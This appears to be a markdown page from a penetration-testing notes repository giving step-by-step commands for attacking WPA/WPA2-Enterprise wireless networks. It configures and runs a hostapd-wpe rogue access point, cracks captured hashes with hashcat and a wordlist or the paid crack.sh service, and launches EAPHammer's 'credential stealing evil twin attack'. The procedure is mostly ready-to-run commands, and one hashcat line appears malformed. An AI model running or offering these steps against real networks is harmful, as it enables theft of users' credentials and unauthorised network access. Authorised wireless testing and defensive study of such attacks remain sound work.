Skip to content

Latest commit

 

History

History
95 lines (68 loc) · 2.39 KB

enterprise.md

File metadata and controls

95 lines (68 loc) · 2.39 KB

Enterprise

hostapd-wpe

1. Install the required dependencies:

sudo apt install hostapd-wpe libnl-3-dev libssl-dev

2. Modify the hostapd-wpe.conf file, ensuring to modify the ssid variable:

nano /etc/hostapd-wpe/hostapd-wpe.conf

#
# hostapd-wpe.conf
# Brad Antoniewicz (@brad_anton) - Foundstone
# ------------------------------------------------
#
# Configuration file for hostapd-wpe
# 
# General Options - Likely to need to be changed if you're using this
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan0
# Driver - comment this out if 802.11
#driver=wired
# May have to change these depending on build location
eap_user_file=hostapd-wpe.eap_user
ca_cert=../../hostapd-wpe/certs/ca.pem
server_cert=../../hostapd-wpe/certs/server.pem
private_key=../../hostapd-wpe/certs/server.pem
private_key_passwd=whatever
dh_file=../../hostapd-wpe/certs/dh
# 802.11 Options - Uncomment all if 802.11
ssid=hostapd-wpe
hw_mode=g
channel=1

3. Kill problematic processes such as wpa_supplicant which may interfere with our access point:

sudo airmon-ng check

4. We can then run our malicious access point and wait for connections:

hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

5. Upon receiving a connection we can attempt to crack the hash provided using Hashcat:

hashcat -m 5500 00 -a 0 /usr/share/wordlists/rockyou.txt

6. If you are unable to crack the hash locally then it can be submitted to crack.sh and cracked for a price:

{% embed url="https://crack.sh" %}

EAPHammer

{% embed url="https://github.com/s0lst1c3/eaphammer" %}

1. Clone eaphammer from the official repository:

git clone https://github.com/s0lst1c3/eaphammer.git

2. Run the kali-setup script:

./kali-setup

3. Finally, setup and execute the credential stealing evil twin attack against a WPA/2-EAP network:

# generate the certificate
./eaphammer --cert-wizard

# launch the attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid MaliciousAP --creds

References

{% embed url="https://teckk2.github.io/wifi%20pentesting/2018/08/09/Cracking-WPA-WPA2-Enterprise.html" %}

{% embed url="https://adam-toscher.medium.com/top-5-ways-i-gained-access-to-your-corporate-wireless-network-lo0tbo0ty-karma-edition-f72e7995aef2" %}

{% embed url="https://www.c0d3xpl0it.com/2017/03/enterprise-wifi-hacking-with-hostapd-wpe.html" %}